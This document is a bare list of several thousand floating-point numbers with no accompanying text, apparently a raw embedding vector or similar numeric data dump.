-0.034797973930835724, 0.016255784779787064, 0.02496922016143799, -0.03633153811097145, -0.0097939008846879, -0.010463092476129532, -0.026795554906129837, -0.009006206877529621, 0.0057961768470704556, -0.05004997178912163, -0.014415507204830647, -0.05590540170669556, -0.01207333616912365, -0.019782982766628265, -0.028803130611777306, 0.04096011444926262, -0.019755100831389427, 0.011118343099951744, 0.019755100831389427, -0.057048603892326355, -0.02045217528939247, -0.01203848235309124, 0.025415347889065742, -0.015014991164207458, -0.007305344101041555, 0.01717592403292656, -0.00581360375508666, -0.002068569418042898, -0.008950440213084221, 0.010107585228979588, -0.007849062792956829, -0.0181100033223629, 0.028440652415156364, -0.0009454077226109803, 0.0008038143860176206, 0.03223273903131485, -0.007598115596920252, 0.004562354646623135, 0.018514307215809822, 0.03449126332998276, -0.0015483774477615952, -0.026725849136710167, 0.005959989503026009, -0.015558709390461445, 0.017872998490929604, 0.01235913671553135, 0.023477479815483093, 0.019281089305877686, 0.01359992939978838, 0.02745080552995205, 0.006629181560128927, 0.006995145697146654, -0.015293821692466736, -0.045839641243219376, -0.011885125190019608, -0.021428080275654793, -0.01194786187261343, 0.019253205507993698, 0.007981506176292896, -0.009264124557375908, -0.004105770494788885, -0.0014995821984484792, -0.02138625457882881, -0.01415758952498436, 0.02048005722463131, 0.0051478976383805275, -0.038143932819366455, -0.02152566984295845, 0.011787534691393375, 0.0004587623698171228, -0.0035376546438783407, 0.0023352005518972874, 0.0471501387655735, 0.021442020311951637, 0.004729652777314186, -0.032901931554079056, 0.028803130611777306, -0.000281226122751832, 0.007235636468976736, -0.045226212590932846, -0.03711226209998131, 0.016729796305298805, -0.023798134177923203, -0.013655695132911205, -0.010748893953859806, -0.00858796201646328, 0.010449151508510113, -0.053089216351509094, -0.009654486551880836, -0.028942545875906944, 0.00040931362309493124, -0.007214724086225033, 0.024481266736984253, 0.005918165203183889, -0.006677976809442043, -0.02282222919166088, -0.008831937797367573, 0.026572491973638535, 0.017580226063728333, 0.031173186376690865, -0.0022602651733905077, -0.009759047068655491, 0.014025145210325718, -0.02282222919166088, -0.0015631902497261763, 0.0024258203338831663, -0.0269907359033823, 0.03220485523343086, -0.013641754165291786, -0.005412785802036524, -0.005594025366008282, 0.02687920443713665, 0.004391571506857872, -0.022766463458538055, -0.003347701858729124, 0.051472004503011703, -0.02936079166829586, 0.01688315160572529, -0.02885889634490013, 0.0366661362349987, -0.009731164202094078, 0.020926184952259064, -0.009410509839653969, -0.0028789190109819174, 0.001173699740320444, -0.01175268180668354, -0.002802240662276745, 0.0075284079648554325, 0.00020324088109191507, 0.012400960549712181, 0.010037877596914768, 0.021121365949511528, 0.01166206132620573, 0.008525225333869457, 0.018193652853369713, -0.007835120894014835, -0.006465368904173374, -0.03658248484134674, -0.0020040899980813265, -0.0022219258826225996, 0.005959989503026009, 0.02576388418674469, -0.0241466723382473, -0.006144714541733265, 0.01624184288084507, -0.0007432560087181628, 0.01972721703350544, -0.004395056515932083, 0.01562841795384884, -0.0036073620431125164, -0.023923607543110847, -0.01307712309062481, -0.013467485085129738, -0.014457331970334053, -0.014847693964838982, -0.02745080552995205, -0.010128497146070004, 0.017203805968165398, 0.010734952054917812, -0.015349587425589561, 0.008511283434927464, 0.022041505202651024, -0.00019049747788812965, -0.01817971095442772, -0.010860425420105457, -0.0008687294903211296, -0.010142438113689423, -0.019852690398693085, 0.004095314536243677, -0.014143647626042366, 0.013355953618884087, 0.005653276573866606, -0.01316774357110262, -0.013014386408030987, -0.0250528696924448, 0.020438233390450478, 0.004137138836085796, -0.031563546508550644, -0.022682813927531242, 0.02004787139594555, 0.013153801672160625, -0.005088645964860916, -0.035160452127456665, 0.039119839668273926, -0.0003467947244644165, 0.028775248676538467, 0.058665815740823746, -0.008741318248212337, 0.01383693516254425, -0.019518094137310982, 0.021065600216388702, 0.0031002401374280453, -0.0025234108325093985, 0.028482476249337196, 0.027325332164764404, -0.05322863161563873, 0.028329120948910713, -0.022487632930278778, 0.027478689327836037, 0.016911035403609276, -0.005555686075240374, -0.024300027638673782, -0.011334436014294624, -0.014101823791861534, -0.02512257546186447, 0.046480949968099594, 0.0040709166787564754, -0.029667504131793976, -0.048460640013217926, 0.02476009726524353, 0.03170296177268028, 0.012840118259191513, -0.04313499107956886, 0.010477034375071526, 0.011536587961018085, 0.008971353061497211, -0.03292981535196304, 0.015726007521152496, -0.022013623267412186, 0.0007484841044060886, 0.010051818564534187, -0.0063817198388278484, 0.012129101902246475, 0.03145201504230499, -0.028036348521709442, -0.02701861970126629, 0.0014011203311383724, 0.018068179488182068, 0.024913454428315163, -0.018528249114751816, 0.041266828775405884, 0.03931501880288124, -0.004130168352276087, -0.004586752038449049, 0.0021609319373965263, -0.03794875368475914, -0.014429448172450066, -0.0010717525146901608, -0.00587634090334177, -0.007793296594172716, -0.03923137113451958, -0.013355953618884087, -0.002178358845412731, 0.0076329694129526615, -0.011508705094456673, -0.011919979006052017, 0.006273673381656408, 0.01688315160572529, -0.004084858577698469, -0.02206938900053501, -0.005367476027458906, 0.02011757902801037, -0.03418454900383949, 0.004046519286930561, -0.014415507204830647, -0.006437486037611961, 0.007002116646617651, 0.010978927835822105, -0.02860794961452484, 0.010588566772639751, 0.004670401103794575, 0.00359342060983181, -0.026363369077444077, -0.03251156955957413, 0.020075755193829536, -0.01692497730255127, 0.018235476687550545, 0.04040245711803436, 0.01706439070403576, -0.03435184806585312, 0.017942706122994423, -0.0074796127155423164, -0.00849734153598547, -0.01947627030313015, -0.009508100338280201, 0.007375051733106375, 0.0046181208454072475, -0.025819651782512665, 0.008420663885772228, 0.02325441502034664, -0.007284431718289852, 0.00929200742393732, 0.012428844347596169, -0.011334436014294624, -0.013439602218568325, 0.005308224819600582, -0.04045822098851204, 0.02335200645029545, 0.008330044336616993, -0.032650984823703766, 0.004534471780061722, 0.0013985063415020704, -0.006249275524169207, 0.01500105019658804, -0.017412928864359856, -0.024843746796250343, -0.014262150973081589, -0.031061653047800064, -0.006751169450581074, -0.011188050732016563, -0.00013484040391631424, 0.008427634835243225, 0.0012660621432587504, 0.006988175213336945, -0.011125314049422741, -0.01717592403292656, 0.021107425913214684, 0.009034089744091034, -0.016158193349838257, -0.016269726678729057, 0.013446573168039322, -0.018263360485434532, 0.009640544652938843, 0.01151567604392767, 0.015349587425589561, -0.008323073387145996, 0.03859006240963936, -0.04466855525970459, -0.011906038038432598, -0.014129706658422947, 0.014206384308636189, -0.010623420588672161, -0.024453384801745415, 0.03443549573421478, 0.00796059425920248, 0.014143647626042366, 0.005625393707305193, -0.03022516332566738, -0.019239265471696854, -0.02669796533882618, 0.016827385872602463, 0.0015692897140979767, -0.0029887082055211067, -0.009619632735848427, -0.013516280800104141, 0.011759651824831963, -0.005228061228990555, -0.00279875542037189, 0.0007724460447207093, -0.01095801591873169, -0.010727981105446815, -0.025973007082939148, 0.01804029569029808, 0.006528105586767197, 0.028147881850600243, -0.02303135208785534, -0.02145596221089363, 0.005844972096383572, 0.029667504131793976, -0.0010264426236972213, 0.002702907659113407, 0.035160452127456665, 0.011836330406367779, 0.022306393831968307, -0.04268886148929596, 0.013920583762228489, -0.046592481434345245, 0.01129958312958479, 0.0057369256392121315, -0.003492344869300723, 0.01886284351348877, -0.012582200579345226, -0.008357927203178406, 0.026642199605703354, 0.007570232264697552, -0.02054976485669613, 0.02489951252937317, -0.011153196915984154, -0.02052188292145729, -0.01642308197915554, 0.014011203311383724, 0.031201068311929703, -0.00954295415431261, -0.01307712309062481, 0.01703650876879692, 0.011508705094456673, -0.02328229881823063, -0.021009834483265877, -0.018807077780365944, -0.010804659686982632, -0.017691759392619133, 0.019030142575502396, -0.03655460476875305, 0.0077445013448596, -0.011564470827579498, -0.003558567026630044, 0.023630836978554726, -0.007145016919821501, -0.008023330941796303, -0.006740713492035866, 0.015391412191092968, -0.025038927793502808, -0.009264124557375908, 0.016297608613967896, -0.015949072316288948, 0.00011185872426722199, -0.008852849714457989, -0.06374052166938782, 0.006061065476387739, -0.016897093504667282, 0.003051444888114929, 0.025024985894560814, 0.03867371007800102, 0.0010255713714286685, -0.012707673944532871, 0.0015265938127413392, -0.002727305283769965, 0.020758887752890587, -0.022919820621609688, 0.024913454428315163, -0.017203805968165398, 0.00024571886751800776, -0.010316707193851471, 0.02963962033390999, -0.028580067679286003, -0.004642518237233162, -0.018347008153796196, -0.017454752698540688, -0.014073940925300121, -0.026279719546437263, -0.0011597581906244159, -0.004942260216921568, 0.013704490847885609, -0.00359342060983181, 0.01804029569029808, 0.030392462387681007, 0.011703886091709137, 0.02888678014278412, -0.013272304087877274, 0.023853899911046028, -0.018165769055485725, -0.0186816044151783, 0.025959065183997154, -0.0063817198388278484, 0.02961173839867115, 0.010260941460728645, -0.009807842783629894, 0.00559751084074378, 0.008385810069739819, 0.004220787901431322, 0.0011266471119597554, -0.04257733002305031, -0.004862096626311541, -0.007193812169134617, -0.011390202678740025, -0.007193812169134617, 0.0014150618808344007, 0.01767781749367714, -0.03435184806585312, 0.010219116695225239, -0.008922557346522808, -0.012916795909404755, 0.017845114693045616, 0.020270936191082, -0.009501129388809204, 0.007085765246301889, 0.010253970511257648, 0.01444339007139206, 0.02795270085334778, -0.03412878140807152, 0.004541442263871431, -0.030057866126298904, -0.027436865493655205, -0.003182146465405822, -0.0015649329870939255, -0.009257153607904911, -0.050440333783626556, -0.016520673409104347, 0.05409300699830055, 0.037642039358615875, 0.016283666715025902, -0.02673978917300701, -0.010065760463476181, -0.02191603183746338, -0.008845879696309566, 0.003948928788304329, 0.010748893953859806, -0.0029311995021998882, -0.012414902448654175, 0.013746315613389015, 0.04157354310154915, 0.0015605762600898743, -0.017775407060980797, 0.047345321625471115, 0.02195785567164421, 0.001781897502951324, -0.009368685074150562, -0.05749472975730896, -0.02651672624051571, -0.012909825891256332, -0.0334874726831913, 0.013125918805599213, 0.002502498682588339, 0.04687131196260452, 0.007556290831416845, -0.01437368243932724, -0.006249275524169207, 0.016186077147722244, 0.0050328802317380905, -0.027408981695771217, -0.010449151508510113, 0.009605690836906433, -0.023059234023094177, 0.01706439070403576, -0.002443247241899371, -0.019992105662822723, -0.009905433282256126, 0.017008624970912933, 0.035662345588207245, 0.004231244325637817, -0.01735716313123703, -0.003725864924490452, -0.007876945659518242, -0.05275462195277214, -0.008685552515089512, 0.01642308197915554, 0.01324442122131586, -0.006702374201267958, -0.007061367854475975, 0.01094407495111227, 0.005792691837996244, -0.023491421714425087, -0.01228942908346653, -0.009563866071403027, -0.028161821886897087, -0.023853899911046028, -0.0061516850255429745, -0.022933760657906532, -0.014889517799019814, 0.014094852842390537, -0.018918611109256744, -0.018305184319615364, -0.02713015116751194, 0.01621396094560623, 0.013997262343764305, 0.025526879355311394, -0.015712065622210503, -0.024746155366301537, 0.028078174218535423, 0.01573994942009449, -0.03306923061609268, 0.0057369256392121315, -0.013962408527731895, -0.02623789571225643, -0.004255641717463732, -0.0009079399169422686, 0.020493999123573303, 0.043246522545814514, 0.0008913844358175993, 0.023184707388281822, -0.008288219571113586, -0.04656459763646126, -0.007939682342112064, 0.007730559445917606, 0.009745106101036072, 0.0026000889483839273, 0.037781454622745514, -0.029193492606282234, -0.016548555344343185, -0.007695706095546484, -0.0004252156359143555, 0.033041346818208694, -0.005946048069745302, -0.022362159565091133, 0.016841327771544456, 0.007054396905004978, -0.003806028515100479, -0.033905718475580215, 0.02687920443713665, -0.0033355029299855232, -0.019518094137310982, -0.03591329604387283, -0.02587541751563549, -0.02706044353544712, -0.025749944150447845, -0.012407931499183178, 0.016938917338848114, -0.007890886627137661, -0.03990056365728378, -0.0036457013338804245, 0.013251392170786858, 0.016799502074718475, -0.0121848676353693, -0.013732373714447021, -0.025094693526625633, -0.005803147796541452, 0.007563261780887842, -0.0010813373373821378, 0.01094407495111227, -0.02264099009335041, -0.03942655026912689, 0.025415347889065742, 0.0004134525079280138, 0.0346306748688221, -0.04455702379345894, 0.0017566285096108913, -0.016911035403609276, 0.0154890026897192, 0.005970445927232504, 0.028147881850600243, 0.005433698184788227, -0.016339434310793877, 0.019434446468949318, 0.02202756330370903, -0.005789206363260746, 0.007793296594172716, -0.003708438016474247, 0.0243697352707386, 0.003135093953460455, -0.007605086080729961, 0.010874367319047451, -0.027046503499150276, -0.0121848676353693, 0.008239423856139183, 0.03635942190885544, 0.00830216147005558, -0.05738319829106331, -0.031563546508550644, -0.01592118851840496, 0.004698284436017275, 0.030782824382185936, 0.007890886627137661, 0.014889517799019814, -0.03209332376718521, 0.01203848235309124, -0.00930594839155674, 0.036275774240493774, -0.01587936468422413, -0.017022566869854927, 0.0020354583393782377, 0.011006811633706093, -0.0016843070043250918, 0.0034888593945652246, -0.014387624338269234, -0.01771964132785797, -0.014094852842390537, 0.007235636468976736, -0.02792481705546379, -0.01500105019658804, -0.015168348327279091, 0.004733137786388397, 0.01437368243932724, 0.000562452245503664, 0.008915586397051811, 0.0036561572924256325, 0.00375026254914701, -0.005109558347612619, -0.014527038671076298, 0.037140145897865295, -0.035885412245988846, 0.0007985863485373557, -0.015698125585913658, -0.003635245142504573, -0.022627048194408417, -0.018556131049990654, -0.015907246619462967, -0.021191073581576347, 0.017956648021936417, -0.05838698521256447, -0.005329136736690998, 0.0053221662528812885, -0.02544322982430458, 0.028301237151026726, -0.0060819778591394424, -0.010964986868202686, -0.013551134616136551, 0.01997816376388073, -0.03398936614394188, -0.03345959261059761, 0.0009253668249584734, 0.019573859870433807, 0.06184447556734085, 0.0075284079648554325, -0.006259731948375702, -0.020507941022515297, 0.0030305327381938696, 0.013293216936290264, 0.01469433680176735, 0.011369289830327034, -0.002443247241899371, 0.009501129388809204, 0.031814493238925934, -0.005872855428606272, 0.0014655997510999441, 0.003497572848573327, 0.006318983156234026, 0.013223509304225445, -0.0240351390093565, -0.013355953618884087, 0.013307157903909683, -0.006217907182872295, 0.00011142305447719991, -0.00385830900631845, 0.02457885816693306, -0.006353836972266436, 0.0064897662959992886, -0.02029881812632084, -0.009138651192188263, -0.04040245711803436, -0.006852245423942804, -0.015405353158712387, -0.008992264978587627, 0.009131680242717266, -0.010135468095541, -0.0027342760004103184, 0.02048005722463131, -0.00718684121966362, 0.01493134256452322, 0.004269583150744438, 0.011961803771555424, -0.005140926688909531, 0.008093038573861122, -0.01166206132620573, -0.024313969537615776, 0.017454752698540688, 0.024732213467359543, -0.017120158299803734, 0.04620211943984032, 0.009117738343775272, -0.0419081375002861, -0.00826730765402317, -0.013258363120257854, -0.01671585440635681, 0.02669796533882618, 0.015935130417346954, -0.0013314129319041967, 0.023812076076865196, -0.0030235620215535164, -0.004729652777314186, -0.006158655975013971, -0.004032577853649855, -0.02022911049425602, 0.00640611769631505, -0.007326256483793259, 0.011655091308057308, -0.005133956205099821, -0.010009994730353355, -0.01090922113507986, 0.005838001612573862, -0.008350956253707409, 0.028775248676538467, 0.020828595384955406, -0.0015902018640190363, 0.004248670767992735, 0.00693589448928833, 0.0036700989585369825, 0.027618104591965675, -0.018137887120246887, 0.008525225333869457, -0.021539611741900444, -0.020284876227378845, 0.013509309850633144, 0.009487188421189785, 0.00792574044317007, 0.030392462387681007, -0.02831517904996872, 0.02997421659529209, -0.004363688174635172, -0.00007836645818315446, 0.0037642039824277163, -0.004635547287762165, -0.017092274501919746, 0.02487162873148918, 0.010588566772639751, 0.0250528696924448, 0.008434604853391647, 0.02368660271167755, 0.004311407916247845, -0.022808287292718887, -0.014805869199335575, -0.010665244422852993, 0.014499155804514885, -0.007981506176292896, 0.019169557839632034, 0.011111372150480747, -0.014540980570018291, 0.024118788540363312, 0.012617054395377636, 0.007514466531574726, 0.0011606295593082905, 0.0003110696270596236, -0.03518833592534065, -0.041266828775405884, 0.0008852850296534598, -0.010037877596914768, -0.010205174796283245, 0.014255180023610592, -0.0006404374726116657, 0.007423846982419491, -0.023867841809988022, -0.030392462387681007, -0.01562841795384884, -0.0016782076563686132, 0.020758887752890587, 0.0007088379352353513, -0.016646146774291992, -0.011926949955523014, -0.007821178995072842, -0.010219116695225239, 0.028412768617272377, 0.04084858298301697, 0.021051660180091858, 0.008866791613399982, 0.007549320347607136, -0.018458541482686996, 0.015461118891835213, -0.02239004336297512, 0.02407696470618248, 0.013070153072476387, 0.008880733512341976, -0.0037955723237246275, -0.016116369515657425, 0.03125683590769768, 0.03557869791984558, 0.006099404767155647, 0.0035794791765511036, 0.0022637504152953625, 0.02651672624051571, 0.006155170500278473, 0.000003189253447999363, 0.010156380012631416, -0.018737370148301125, -0.015070757828652859, 0.013969379477202892, 0.031061653047800064, -0.0017026052810251713, 0.006921953056007624, 0.02206938900053501, -0.0389525406062603, 0.00707879476249218, 0.016200019046664238, 0.00858796201646328, 0.02462068200111389, 0.009257153607904911, -0.007737530395388603, -0.010867396369576454, 0.02623789571225643, -0.01829124242067337, -0.04620211943984032, -0.011843301355838776, -0.03898042440414429, 0.0037711746990680695, 0.0071345604956150055, 0.004670401103794575, 0.016395200043916702, 0.0019221837865188718, 0.0034749179612845182, -0.007127590011805296, -0.004572810605168343, 0.039761148393154144, 0.0015187517274171114, -0.00830216147005558, 0.03187026083469391, 0.014150618575513363, 0.011278670281171799, 0.03942655026912689, -0.015907246619462967, -0.005008482374250889, 0.0010107584530487657, -0.03248368576169014, 0.03242792189121246, 0.007507495582103729, 0.023156825453042984, -0.022041505202651024, -0.012854059226810932, -0.006796479225158691, -0.024537034332752228, -0.014276091940701008, -0.03242792189121246, -0.014262150973081589, 0.01166206132620573, 0.000958477845415473, 0.000046208435378503054, -0.0201594028621912, 0.009717223234474659, -0.017552344128489494, -0.03061552532017231, -0.001193740637972951, 0.021999681368470192, -0.011048635467886925, 0.0012582200579345226, -0.024843746796250343, 0.022236686199903488, 0.016506731510162354, 0.0062004802748560905, -0.016004838049411774, 0.012840118259191513, 0.03694496676325798, -0.023310182616114616, 0.01550294365733862, 0.017203805968165398, -0.030141515657305717, 0.027367157861590385, 0.01302832830697298, 0.011466880328953266, -0.014527038671076298, 0.006496737245470285, 0.041238944977521896, -0.03471432626247406, 0.004586752038449049, -0.004067431669682264, 0.005614937748759985, -0.005534774158149958, 0.013892700895667076, -0.008371868170797825, -0.008406721986830235, -0.0031978306360542774, 0.0023142884019762278, -0.006869672331959009, 0.005120014306157827, -0.0020110609475523233, 0.011703886091709137, 0.002296861493960023, -0.028189705684781075, -0.005890282336622477, -0.014178501442074776, -0.00020770651462953538, -0.009166534058749676, 0.014255180023610592, -0.016827385872602463, 0.022627048194408417, -0.007953623309731483, -0.0011606295593082905, -0.005346563644707203, 0.0024502179585397243, 0.00044177117524668574, 0.0473732054233551, 0.01196877472102642, 0.008316102437675, 0.007207753602415323, 0.014791927300393581, -0.005011967848986387, -0.009466275572776794, 0.0032727662473917007, 0.0047540501691401005, -0.015558709390461445, 0.04023515805602074, -0.00989846233278513, -0.01929503120481968, 0.01415758952498436, 0.009940287098288536, 0.015475060790777206, 0.000916653370950371, 0.008936499245464802, 0.0018646750831976533, -0.006102889776229858, 0.01437368243932724, 0.016576439142227173, -0.01979692466557026, -0.01397635042667389, 0.0052733710035681725, -0.012240633368492126, 0.038534294813871384, -0.0033494443632662296, -0.019058024510741234, 0.012840118259191513, -0.024355793371796608, -0.04204755276441574, 0.00824639480561018, -0.0029102873522788286, -0.009724193252623081, 0.011459910310804844, 0.005548715591430664, -0.018667664378881454, -0.010379443876445293, 0.031535662710666656, 0.007120619062334299, -0.019378678873181343, 0.030671291053295135, 0.002392709255218506, 0.003875735914334655, 0.017385045066475868, 0.022808287292718887, 0.0261960718780756, 0.01306318212300539, -0.01430397480726242, -0.008148804306983948, -0.024300027638673782, -0.003502800827845931, 0.031926024705171585, -0.004614635370671749, 0.006102889776229858, -0.01176662277430296, -0.011104402132332325, -0.02849641814827919, 0.016590381041169167, 0.002375282347202301, 0.01324442122131586, 0.003948928788304329, 0.001995376544073224, -0.010525830090045929, 0.009835725650191307, -0.018765253946185112, -0.024606740102171898, -0.02752051316201687, -0.013209567405283451, 0.006528105586767197, 0.0015771317994222045, -0.006995145697146654, -0.008678581565618515, -0.03334805741906166, 0.012770410627126694, 0.008845879696309566, 0.032065439969301224, -0.007535378914326429, 0.0065490179695189, -0.009152592159807682, 0.0037014672998338938, 0.009410509839653969, -0.011564470827579498, -0.0041650221683084965, -0.026600375771522522, 0.03108953684568405, -0.011585383675992489, -0.005754352547228336, 0.013843906112015247, 0.0064305150881409645, -0.0037049525417387486, 0.007507495582103729, 0.002370054367929697, -0.023115001618862152, -0.022724639624357224, -0.008936499245464802, 0.00025116477627307177, 0.005642820615321398, 0.007214724086225033, 0.01045612245798111, 0.00898529402911663, -0.001387178897857666, 0.015572651289403439, -0.03108953684568405, -0.01148082222789526, 0.021400196477770805, -0.0029625678434967995, 0.0012948164949193597, 0.0025669781025499105, 0.018918611109256744, -0.014582805335521698, 0.00009328821761300787, 0.014331858605146408, -0.028482476249337196, -0.017984529957175255, 0.006674491334706545, 0.003091526683419943, 0.017329279333353043, -0.006088948342949152, 0.0255129374563694, 0.013523251749575138, -0.01731533743441105, -0.0269907359033823, 0.025568705052137375, 0.009619632735848427, 0.007089250721037388, 0.0009628345724195242, 0.007612057030200958, -0.02587541751563549, 0.019253205507993698, -0.007612057030200958, 0.009298978373408318, -0.0005201920866966248, -0.005468552000820637, 0.014959225431084633, 0.032316386699676514, 0.013955437578260899, 0.031786613166332245, 0.0007275718380697072, 0.01995028182864189, -0.0028388372156769037, 0.007786325644701719, -0.025206224992871284, 0.011034694500267506, 0.03175872936844826, 0.00964751560240984, 0.014276091940701008, 0.016618262976408005, -0.004900435917079449, -0.010832542553544044, 0.00747264176607132, -0.017231689766049385, 0.03574599698185921, 0.007099707145243883, 0.016869209706783295, -0.016046661883592606, 0.019824808463454247, -0.00907591450959444, -0.010881338268518448, -0.020493999123573303, -0.01742687076330185, -0.00125996267888695, -0.005433698184788227, 0.008608873933553696, -0.002080768346786499, 0.01081860065460205, -0.017705699428915977, -0.028691599145531654, 0.015614476054906845, -0.014262150973081589, -0.007486583665013313, -0.017984529957175255, 0.016018779948353767, -0.004659945145249367, 0.0037119234912097454, 0.02145596221089363, 0.012491581030189991, 0.004541442263871431, 0.02239004336297512, -0.0042242733761668205, -0.001568418345414102, -0.006312012206763029, 0.007061367854475975, -0.008504312485456467, 0.012268517166376114, 0.005433698184788227, 0.003527198452502489, 0.0031978306360542774, -0.0023299725726246834, -0.016841327771544456, -0.010700098238885403, -0.01201756950467825, -0.0059669604524970055, -0.00577526492998004, 0.012902854941785336, 0.0107070691883564, -0.0012765182182192802, 0.017273513600230217, 0.01585148088634014, -0.006493251770734787, 0.007382022216916084, 0.007535378914326429, -0.014652512967586517, -0.0076538813300430775, 0.009194416925311089, -0.0175384022295475, 0.023491421714425087, -0.008727376349270344, 0.017594167962670326, 0.01380208134651184, 0.017385045066475868, -0.01095801591873169, -0.0014995821984484792, -0.01116016786545515, 0.025596586987376213, -0.018528249114751816, 0.010288824327290058, 0.012533404864370823, 0.0004648617759812623, -0.009940287098288536, -0.02328229881823063, -0.02418849617242813, 0.0021626746747642756, -0.005907709244638681, -0.007723588962107897, 0.0020406865514814854, -0.0021173646673560143, -0.00887376256287098, -0.007214724086225033, 0.010253970511257648, 0.00849734153598547, 0.02863583341240883, 0.010839513503015041, 0.021902089938521385, 0.004269583150744438, 0.005628879182040691, -0.012888913042843342, 0.00125996267888695, 0.03173084557056427, 0.024481266736984253, 0.0016991198062896729, 0.016618262976408005, 0.01394149661064148, -0.008295190520584583, 0.002418849617242813, -0.010428239591419697, 0.005078190006315708, -0.0043497467413544655, 0.027980582788586617, -0.005869369953870773, -0.014666453935205936, 0.017733583226799965, -0.0007768027717247605, -0.013829964213073254, -0.00993331614881754, -0.0014176758704707026, -0.010804659686982632, 0.011933920904994011, -0.011745710857212543, 0.006963777355849743, -0.01282617636024952, 0.013035299256443977, -0.025024985894560814, 0.014596746303141117, 0.01331412885338068, 0.0009079399169422686, 0.0028109541162848473, -0.01731533743441105, 0.0006073264521546662, 0.013091064989566803, 0.004952716641128063, 0.0008543523144908249, -0.0065943277440965176, -0.020493999123573303, -0.0034104385413229465, -0.012658878229558468, -0.008929528295993805, -0.0020668269135057926, -0.010379443876445293, -0.009522042237222195, 0.024857688695192337, -0.014847693964838982, 0.0038164847064763308, -0.01799847185611725, 0.006437486037611961, 0.0007532764575444162, -0.009717223234474659, 0.0269907359033823, -0.003316333517432213, -0.01282617636024952, -0.0068940697237849236, -0.019420504570007324, -0.01904408447444439, 0.01667402870953083, -0.00031564419623464346, 0.00017012981697916985, -0.0029451411683112383, -0.022989526391029358, 0.004527500830590725, 0.01613031141459942, -0.014199414290487766, -0.016771620139479637, -0.015056815929710865, 0.026823438704013824, 0.009201387874782085, -0.017161982133984566, 0.01915561594069004, 0.025973007082939148, 0.012338223867118359, 0.026168188080191612, -0.010414297692477703, 0.002751702908426523, -0.0012861030409112573, -0.024341853335499763, -0.00016250555927399546, 0.0017714413115754724, 0.007674793712794781, 0.008357927203178406, -0.0024763583205640316, 0.00796059425920248, 0.003635245142504573, 0.001568418345414102, 0.02220880426466465, 0.004248670767992735, 0.00937565602362156, 0.016576439142227173, -0.00989846233278513, -0.007577203214168549, 0.00027207701350562274, -0.024244261905550957, 0.013300187885761261, -0.030420344322919846, -0.026962853968143463, 0.003952414263039827, 0.0032640527933835983, 0.03953808173537254, -0.007897857576608658, -0.001257348689250648, -0.017161982133984566, -0.0077026765793561935, -0.027576278895139694, 0.01331412885338068, 0.0010438695317134261, 0.011738739907741547, -0.012442785315215588, 0.0035428826231509447, -0.013300187885761261, -0.006639637518674135, -0.01525199692696333, 0.0024746155831962824, 0.025359582155942917, -0.007047426421195269, -0.02899831160902977, -0.02188814990222454, 0.014764044433832169, -0.01674373634159565, -0.0009576065349392593, -0.0011946120066568255, -0.014066969975829124, 0.005308224819600582, -0.00020934027270413935, 0.004217302426695824, -0.003305877326056361, -0.023115001618862152, 0.016088487580418587, 0.011188050732016563, -0.00041497734491713345, 0.008776172064244747, 0.0018594471039250493, 0.02022911049425602, 0.0125264348462224, -0.012610083445906639, 0.0027151063550263643, -0.0015509914373978972, 0.0169668011367321, 0.026893146336078644, 0.007092736195772886, 0.021051660180091858, -0.005656762048602104, 0.014875576831400394, -0.004001209512352943, 0.006099404767155647, 0.003544625360518694, -0.015475060790777206, -0.010665244422852993, -0.0063817198388278484, 0.0077584427781403065, 0.0024327910505235195, -0.009173504076898098, -0.0043497467413544655, 0.010609478689730167, -0.005935592111200094, -0.004530986305326223, 0.013488397933542728, 0.024857688695192337, 0.017803290858864784, -0.010895279236137867, 0.019183499738574028, -0.001347968471236527, -0.022180920466780663, 0.003582964651286602, -0.01875131204724312, -0.007953623309731483, -0.004412483423948288, 0.022376101464033127, -0.000321090075885877, -0.022501574829220772, -0.0014307460514828563, 0.017273513600230217, 0.0013366409111768007, -0.004935289733111858, 0.008783143013715744, 0.014791927300393581, 0.02098195254802704, 0.002802240662276745, -0.0029555971268564463, -0.01663220487535, -0.006454912945628166, 0.0012094248086214066, -0.0074796127155423164, 0.008420663885772228, -0.010240028612315655, -0.0031908599194139242, 0.0059774164110422134, 0.0014255179557949305, -0.009264124557375908, -0.0073541393503546715, -0.010700098238885403, 0.003509771777316928, -0.011459910310804844, -0.01324442122131586, -0.007639939896762371, -0.00008882257679942995, -0.005346563644707203, 0.011822388507425785, 0.005140926688909531, 0.009082884527742863, -0.0068452744744718075, -0.007556290831416845, -0.05303345248103142, -0.01940656267106533, 0.005587054416537285, -0.008309131488204002, 0.003725864924490452, -0.001517009106464684, -0.003298906609416008, -0.010574624873697758, 0.011585383675992489, -0.013613871298730373, 0.0029765095096081495, -0.011641149409115314, 0.0008295190054923296, 0.00390710448846221, -0.0023108029272407293, 0.024606740102171898, -0.015293821692466736, 0.007932711392641068, -0.009117738343775272, 0.0035376546438783407, 0.014290033839643002, 0.002627972047775984, -0.010839513503015041, 0.01983874849975109, -0.007946653291583061, -0.0104212686419487, 0.015461118891835213, 0.0036944965831935406, -0.030169397592544556, 0.011913008987903595, -0.005939077585935593, 0.00026096738292835653, -0.0049840849824249744, -0.03532775118947029, 0.003321561496704817, 0.01394149661064148, 0.012561287730932236, 0.024537034332752228, -0.0005851071910001338, -0.000018992564946529455, -0.006434000562876463, -0.0003831733192782849, -0.02239004336297512, -0.025568705052137375, 0.014101823791861534, 0.04160142317414284, 0.01272161491215229, 0.0017522717826068401, 0.003948928788304329, -0.002164417179301381, 0.014429448172450066, -0.013739344663918018, 0.019267147406935692, -0.024857688695192337, 0.02152566984295845, -0.00601924117654562, 0.016339434310793877, -0.019211381673812866, 0.01387178897857666, 0.00004830510442843661, -0.006061065476387739, 0.003147292882204056, -0.010072731412947178, 0.010295795276761055, -0.02328229881823063, -0.0006068907678127289, 0.01774752512574196, 0.0228919368237257, 0.015210172161459923, 0.005398844368755817, 0.014290033839643002, 0.0008813639869913459, -0.008371868170797825, -0.008141833357512951, -0.02098195254802704, -0.017161982133984566, 0.013342011719942093, 0.03200967609882355, -0.0042347293347120285, 0.0033808129373937845, -0.0046181208454072475, -0.006461883429437876, -0.017454752698540688, -0.005391873884946108, -0.010205174796283245, 0.01599089615046978, -0.004586752038449049, 0.002502498682588339, 0.01836095005273819, 0.025889359414577484, -0.0071136485785245895, 0.0017566285096108913, 0.015349587425589561, 0.018821019679307938, -0.028203647583723068, 0.007347168400883675, 0.012045452371239662, -0.01656249724328518, 0.008427634835243225, 0.003196088131517172, -0.0041092559695243835, -0.006597813218832016, -0.0098496675491333, 0.009870579466223717, -0.007828149944543839, 0.006789508741348982, -0.0006696275086142123, -0.0007524051470682025, 0.020061813294887543, 0.016158193349838257, 0.0022654931526631117, 0.002894603181630373, 